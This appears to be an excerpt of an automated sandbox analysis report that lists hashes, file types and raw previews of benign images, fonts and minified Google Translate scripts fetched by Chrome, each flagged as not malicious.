                                                                                                                                                                                                                                                            Entropy (8bit):7.9567962670682055
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:GxHGa1fXc6EPUXWhrNMqswFrIr1xJkhpIzXZyS0c4SCV65jwb5BQT:GxHGMfc6EPYWhrNLswF0SITZyS0fwdxT
                                                                                                                                                                                                                                                            MD5:9B0F270CF582C7BBF1292B15DBFB7055
                                                                                                                                                                                                                                                            SHA1:636580A66563E594232E260247F704194182A129
                                                                                                                                                                                                                                                            SHA-256:4F4761FF1AE0A329D16C1D11DCA7FC6B762672412D4757B1473E7D38EAF742D1
                                                                                                                                                                                                                                                            SHA-512:286FDFB34E39754FF3F95B41146410E2F5FE412698E05D8BD23C5749323684746D8C4520C4CABE8E1F961084392F8F42723224011AE9670FE410DBE00EC05795
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2014/first-day-of-fall-2014-6370654056087552-hp2x.jpg
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................+............!.1..AQa"..q.......2#...$3.BC%..9Rb.4WxY.r.S..&......:..T.5Uu.Fv.7w..(8Xh.I.......................!..1.A..Qaq"...2..BR#....br3.....S$.C......cs.4T%.t.U......5&68.............?........`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):455
                                                                                                                                                                                                                                                            Entropy (8bit):5.263945888138197
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF5vDytxZWM1UD0IJDHhiXDIyQ9NlpkbRNkN0:k6Pq7vmtxZWM1UHJ1+MysNErkK
                                                                                                                                                                                                                                                            MD5:E3A8351FC379085AE064E0E11F054C0F
                                                                                                                                                                                                                                                            SHA1:73121AEA0904A6A63FE9D36ED42D5283A4B4D51C
                                                                                                                                                                                                                                                            SHA-256:731B29085390D2655689BDA42E62A326C23CF45DA978C47D1CDAC285220EBBFD
                                                                                                                                                                                                                                                            SHA-512:73C57BF36CACAD98636E519CC229BAE572BB093DD53BAD4E6854994B3140357CF98E6708D920B5D1B69EA9F34C28DEC9E0408D1201870C790D93D8B24F5333DE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=rQ304"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("rQ304");.var AS=function(a){_.jw.call(this,a.va)};_.C(AS,_.jw);AS.qa=_.jw.qa;AS.prototype.Hc=function(){return"rQ304"};AS.prototype.Gd=function(){return!0};AS.prototype.Ic=function(){return _.zS};_.iw(_.gsa,AS);_.Dv.rQ304=_.Nz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 2096x1182, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):156090
                                                                                                                                                                                                                                                            Entropy (8bit):7.714100651227665
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:qwKuuF+/z5Y/2LM4gWSWt4D2xVM0FCfHuYVZw/gAP1l5m:qhodY/WSWODAVgWk0tnm
                                                                                                                                                                                                                                                            MD5:846258590677C245BD9107CFEBC81F4F
                                                                                                                                                                                                                                                            SHA1:D01EFA679158E9B160CE8CBFA3DFAD4B1A42BD59
                                                                                                                                                                                                                                                            SHA-256:02319658A6AB456351F9191BA0A06ADF78D77510CA933AD8287A2C9633D81145
                                                                                                                                                                                                                                                            SHA-512:8A2119806083E13D0DEDF0A84EDF8A5590D489883CC5F53DEBF281B7C7AA1A831574CAD8EC2D3D26CBDF4C6203BA4825816589DED8198DA48BFCCF3E73A1006D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................)......a...............................................................................................................................................0.......................................................................................... 0@1.3P`p!4..2.5..A"#D$..%.&6......................!1..AQq..2r.. 0@P`a."34..BR..#.p.b...s..C$...S.T..................!0..p...........................!1 0@AQaqP..`.......p.................0..........................6.......Y`........lo=.._...................m...............................VZK.Y..............................%.6........Ime..\..........u.RP..#...u.R.................{-`..............................%.rk ...............................,...........5...7..}>.@......,.....b..8...................<.l...............................<.fK..............................\Y.u..:.d.............<..S].O.........a.d.@...n]g.u.Y.................%.@...........................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (26504)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):323228
                                                                                                                                                                                                                                                            Entropy (8bit):5.6453143937146
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:Muxq/su5I1rAh4iVFmmpLUzQLy2WRTae3O2EKXCgUouFUtIrRoGKf:MuNr1r+4XmpLfn2Ta27qouFUCrqx
                                                                                                                                                                                                                                                            MD5:506D92A1082E7E3D45F3ABFACBBF3956
                                                                                                                                                                                                                                                            SHA1:CB7E8827FC47F5DB522BE55950F319ED9157C2B7
                                                                                                                                                                                                                                                            SHA-256:779B5C238E9B9D282CAADB269FDF17BC4CA24E64C74A7C225940E021B27132C3
                                                                                                                                                                                                                                                            SHA-512:BCD3978459F5199E7BFA1C88AC482561F869F811F1344745B962529F7BE6E4B6E583B6650872676A358C259A5A0FA49A8240D02C37AA08B7EB88A83701C6A959
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=_b,_r,_tp/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=i5dxUd,m9oV,UECOXe,pKzUve,j4UNFc,IZT63,ws9Tlc,n73qwf,UUJqVe,TzmfU,CHCSlb,O1Gjze,rCcCxc,RAnnUd,PrPYRd,O6y8ed,mzzZzc,MpJwZc,uu7UOe,hB8iWe,XVMNvd,KUM7Z,s39S4,duFQFc,fmklff,soHxf,UWMmZb,SdcwHb,pw70Gc,MJWMce,MnwvSb,xQtZb,gJzDyc,XBRlNc,QIhFr,hc6Ubd,SpsfSb,zbML3c,JE2clc,JPvYpc,TJQ3Ud"
                                                                                                                                                                                                                                                            Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 850 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):30705
                                                                                                                                                                                                                                                            Entropy (8bit):7.981692386751896
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Qf2pUWJccDBX/E/k+5gpIGCCq4KyAVdA733R40A:3pU+DpX+qiGCd4KyAXc3B4t
                                                                                                                                                                                                                                                            MD5:2236CF423BFE4A7426DED26C5966B0F3
                                                                                                                                                                                                                                                            SHA1:22C7E210F93CD17F6D3740DAC6216B578414C291
                                                                                                                                                                                                                                                            SHA-256:589031AED6ABF827386F9582D80AC66FB69B4AE27DD21E0B1FC851FCA0BCC939
                                                                                                                                                                                                                                                            SHA-512:AD097B39192F673DE533448D1C5E76946F70CD99E000F662865CD221163C892F8CBB1017E29BD7AE72C45073FBDF0902C3D41CDF985175668F560540F59A635C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...R..........G......PLTE..................................................................................i.^.Y.....d.e.b....f.......y.p...........................o.e....C.K.]............z.|5..:.>.S........A.D...........................nl.............t.G.9.F.l>C'(K//jE4.u.HvN:P3/.U9.C.X...?.G]>7.E.EV82.K.`..F.d.[..U..T....E..D.~:....O..fIHu\Z..E..^.zy.C..D.D._...........~.....s..bq.jx.\l....Vg.FY.N`.AT.CV.Rd.>R.H[.JZ.I\..C...`<..........Y.ic.qO.`E.W<.Pm.z......"s=,xD0zF7~L4}J2{H0{H3|I....(vA4|I......$t?.s?...k>K^........~.............................u.............................WZ.BG.LP.>D.9>.qt.....|~.il...ad.6<.;A.28.?Dk.I.p9.r:...T..J.tH.rA.l^..l..u..........n.y.v.k.Y.(...t.IDATx................<..........................._....9.\{...N....D. ...4{WuS...W...2..}'.L\...g.'.7{..g-,.D"R..H.a.Wr.G..$.O..B.n..%Y..@g.|.#.|..C.....A,.m.8.$.....!7!..[..L.y..s...|yN.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 711 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):45350
                                                                                                                                                                                                                                                            Entropy (8bit):7.933007816308371
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:wnJOknm+NJKmGhglD8qRsKKsEKzXShEZcMyn87kWLhFbLo6ATRBxCGkBeyT28jkY:SZnm+NJBPH2sxShzMK2FPE67+HXat
                                                                                                                                                                                                                                                            MD5:F32E6271C6C5603E4BB9049FA298D945
                                                                                                                                                                                                                                                            SHA1:2C16488B186E9D20A1E737F9A1449CC3B68EC43F
                                                                                                                                                                                                                                                            SHA-256:52C102B7949F96C195A6AECEF5C8ED25677B6737B9ED6985E6428DBF79521626
                                                                                                                                                                                                                                                            SHA-512:D9C155AF6F18CB999CF079C19E6FE6DB41AABCE2EC9C260EE0DD220458F15E406FA2388069A177388BCAFF21A26FF4E70326C932456290B4B55E5318BFC1274C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2020/recognizing-ignaz-semmelweis-and-handwashing-6753651837108746.2-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a..............0.........u...(rp.Ox.9..........).bW....2$......B4e....bRPd........xyz...DDTeeh99K.....\............q..........ee.@..p...VVX...4.X......668GGG......4y............T......$$'..:}.........wx....D........(q...t...]j...D..-t..?v.....UShJJ\....^.hiq...Z...........#.KYXn...M....R...............()1N..B.......'\[qLK_..v..=i.;q.........V.v...........>y.wGQ.......e9A...Km....N.4...[[_......>...LMPpkM..=v...A....7A....#n....:...FEX...............-../v..WVk+].......caw............PQT``e...Sg....-&.3~.............G.............4:''...O^.Dq................&....3.. F..S..210NNb...4."?..4e.UIT,.R.O.pn.oo}.h..../HHY..............E...AAB...OQf0/;..#lk.nn...................6R.;<=4b...@../CWs......nnn|]qutp..>HHQ......s.....@........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (975)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):46056
                                                                                                                                                                                                                                                            Entropy (8bit):5.5007083252092945
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:yxKmssXUYwPmMpMuWxs75YNMxjgIqMEjqeaF2+SmuVNzU8xuH3+8/+q0hxlaa1Ij:WE4sKD1p5w
                                                                                                                                                                                                                                                            MD5:696755265ACDAFA85C16BF6972F2DCEC
                                                                                                                                                                                                                                                            SHA1:E7044758846FE7A3F9EAFCC14CED750AB72D1BC3
                                                                                                                                                                                                                                                            SHA-256:60676488AD60E82A1C6467C4E4079FB9F981C99C7A34A2D6D7962CCB66ED9220
                                                                                                                                                                                                                                                            SHA-512:FFB1230C9FE210C43777FF353FA988AB0EE73AB5DC9A08B414D32D11E39E7A3453684DBDACD5DFA6AAB8E1BD3715B1B44FA7C8C413403820FBD0010F7221A0DA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=_b,_r,_tp/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=i5dxUd,m9oV,RAnnUd,uu7UOe,soHxf"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{.var noa;_.Cn.prototype.Hz=_.ca(14,function(){});_.Pu=function(a){for(var b=_.z(a.mZ),c=b.next();!c.done;c=b.next()){var d=c.value;if(c=_.to(a.na,d))if(_.Ca(c,a.cb),0==c.length){var e=a.na;c=(0,_.Cg)(e.getAttribute("jsaction")||"");d+=":.CLIENT";c=c.replace(d+";","");c=c.replace(d,"");d=e;d.setAttribute("jsaction",c);_.Pe(d)}}};.noa=function(a,b,c){var d=a.qa;if(!d)return _.Ue({});d=d.call(a,c);d=_.Hd(b,d);a=Object.getPrototypeOf(a);var e=noa(a,b,c);d=d.addCallback(function(f){return e.addCallback(function(g){f.va=g;return f})});_.Ze(d,function(f){if(f instanceof String)f="Failed to retrieve dependencies of service "+c+": "+f;else{var g="Failed to retrieve dependencies of service "+c+": "+f.message;try{f.message=g}catch(l){throw Error("Ha`"+g+"`"+l);}}throw f;});return d};._.Qu=function(a,b,c){c=noa(b,c,a).addCallback(function(d){return new b(d)});c.addCallback(functio
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):111830
                                                                                                                                                                                                                                                            Entropy (8bit):7.886479791646624
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:gSEro86gVAGuUJ6m7WLe3KKcj1zG/lHoTSV0fk:dEro86gVAORL3KKc5kIWac
                                                                                                                                                                                                                                                            MD5:CAD066AA5000D5318EC2AEB1FF09FC92
                                                                                                                                                                                                                                                            SHA1:874E026942B1621477EC77C0DC2443B8222E19D5
                                                                                                                                                                                                                                                            SHA-256:F1C19DEF8ABE99D6E922755FC028D2CF35BF3419B020D7F955F1C202D2C7936C
                                                                                                                                                                                                                                                            SHA-512:F2C27B8CA39131DC749A3764D58390D581312F440621AFBB19B212F54D8F946D344FC2FFC9A890C40885062C3AD6DBA73688E0AFE8CF32392BA0ECDE0B5F3276
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/translate/pwt_hackathon_bard_logo_processing.gif
                                                                                                                                                                                                                                                            Preview:GIF89a@.@..........!..NETSCAPE2.0.....!.......,....@.@...............................<..&..............................,....B..1.....<...... ..%..!..............-l.ah.q}.R..3..'..$..7..9....I.....6...........1..0a.\..O.n..C..'..Eu.K..3.......5..@..,M....Zy.I]....E...J..U.f....)p.S...R...'..-...i.Q. ..$...........<..1..5.....O.~K..N..K..K....v.....Q..y.Yc..K.v..ur.M..C....<....~..-b.T..5U..E...U..V.`r.Uu._.....2L..T.s............x..j....S..._....[....B......{.........c.t....2..z].e....[.y.........k.I..?X._U..c.i.....WU.....O..p.a..r.........R....-..Sy.Vv.G..JW......U{.Kn.t~.Gt.^..M..J....}p.}.....|.D.,.....0..h......)..2...i.u..L..2..g...........?..h........n....X..........>.....|..................o.m.........n...V.x..M..V....N...............X{.Oj.sj.s......H......*\....#J.H....3R.e........I....Y2.I^Kv.x...C6..V...!q.$h.......%p..K.*..!..4...OL(@6u"....<.....&..BT.B...+.`q.!..Wj.&........\...U^..T......!"<.b......m
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 14432, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14432
                                                                                                                                                                                                                                                            Entropy (8bit):7.984692702201193
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:/g2pO94vOhI9vNV7mS8pMFGh9stl+8j1yl9uwuugjn62v3:/XpOs+I9vH7AMFG0Wqcl9Jom2P
                                                                                                                                                                                                                                                            MD5:343CE3BCAE6F909A07EB836C7989A3C5
                                                                                                                                                                                                                                                            SHA1:B748B9ED18BF4580D151F6B5D61668B3541BEFA8
                                                                                                                                                                                                                                                            SHA-256:15E749617A3856BFAA4D2CEA0C50D88366D2B579841BD5A45BD2D34062BABC51
                                                                                                                                                                                                                                                            SHA-512:3CB2541C37FA5C50A7C281ABC872FBC644169E070E4A09D5E4BA7B5DF02509DD49E7A5796641DEB0892B45E87CAC5EC1102FFAC68C34B8D4872C58D5F39BFA40
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjYUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......8`..........7...........................>..B..$?HVAR.#.`?STAT..'..../<....(....Z.0.l.6.$..0. ..>. ....u.pg/.q;...H..a.C....D.....{b...BR../....b..l..^.F.8e.c..u^.:P....c...0...g.S...q&F.E..O.bF5$2.3\....%..&$*......":xE..E.l.|.f...0.Gm."..Xz.....l..j.".y."g.5..d..Ghr.=....}.{....`....f.I.......$.........$..I..s""...`!H...+.....6...N...M>[....Sq*n......9..c...J.N..`....g16..`.(1....y.bo....q...M7..T.9..O@..A=w....A!X...]...XI.D.L...........'...gR.Y...5.9.f..jg.........L..a......X.V.$.,..uv.7......t.A.1..{yx.O./'...4...X......&.-.$..... .L.4.w6..OWfz .w..?...<.$/.../0.=k.d..;..C.X/...6.........B+.E.....@...R;w.n..._Ba.....i.e..<.....MTdOU....,I..Y%.....s..,.+j@....Jg....&.s2.XE$.....@.V..W..Y!..[#..:..=.7.c...a'EuPT;.....d....H..h}.u..n`.........A_..M..AQ..c..G...I9z$T.1J0...:.....s~/atl^..'.b@.7...*..}k..~.m..t... .... ...`.<...^...Y........R.....DI.bd.....8A.< (....T...h.i..2M7H.~......=..-.Yn..'>..1...*.5.....S.g<i ....&p...b4...-......H
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2719
                                                                                                                                                                                                                                                            Entropy (8bit):7.847387915856727
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:xj7AYdQ+LtSUAVrMIFc/uEjVy3WZYkJMsXx9eIrup9PK/jzS1:SY++LtSRVrMPjym1qgQc/j6
                                                                                                                                                                                                                                                            MD5:DE31A314C8C6A530F5C00933C2D4465F
                                                                                                                                                                                                                                                            SHA1:A2C054C2C7DE42283EBEA8186EF44137477BF32E
                                                                                                                                                                                                                                                            SHA-256:095FFAF49603A67662294AD58EE01E65E29224BFF93F2C0B25BA0AE1B0439A3C
                                                                                                                                                                                                                                                            SHA-512:1D7B865FFECB5849FC506C4E101561177B6CBEB3A62472D764A5B5FF7B641A4C3E6AC55705C7186E5D14E3CAE32D49DAC8A2BFD275237ED096AECFE9EE0599CB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/i/productlogos/translate/v5/web-64dp/logo_translate_color_1x_web_64dp.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...@...@......iq....fIDATx..r.K.@gy.`.....3333sb..af...c..4...q...m.*...:..KZp.:h....3...........2~.....?.1.H{..w.fP2.]R.2e..#E.4..3.:HP...B-,.F&.....U6C..h..~....0%H..I..fH...0.... U.`.....UK@,.'.Z...:.S.."M`.o.....8.G..i...xx6@..E. 0`b.q../.0.hW&C.$..ZV,.{.....R$...."y....2.~T,.ibq..x...F...bH."0P...<...2..t../...O\~...................]]]..........!ikkCp....V.......% ....}b..f()..G.e.l.t0.......q7.A.a.P,.,D.C"....X....>...U.`...>.m...Ge....p.....PPd..*.T.4.o.g...=.RW.x.!!..>T...A.6.AoooH..}...P....W......V..jk..@..himu3$D..@Z1.7..(E.|.M/.}4.T..}...%V.29...@SS3......H4 A..J...{....E.~.5+..\.Y.$....A..+TV:.ju.,.X......... ...%..&_..... ...6..#....._.P^n....n....jhii.w.:%$D.A(.)..n.np.y...HZ..O7...<..Z.....dv..%......I~...d(.^*g.L...W".W......1Z.........>.F.....P..W..t}H.|..'n.p.U.O..S...UP[[..A ?r...'y....'b..!M.....h...x.pjjj...C^..%BA.H.._{.....R0.4....b..W..f..^./...p...7!...x.S...E.~...@S.....e...........`..`..8Xq$..............h....._T..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3175)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):217275
                                                                                                                                                                                                                                                            Entropy (8bit):5.484010003606233
                                                                                                                                                                                                                                                            Encrypted:false
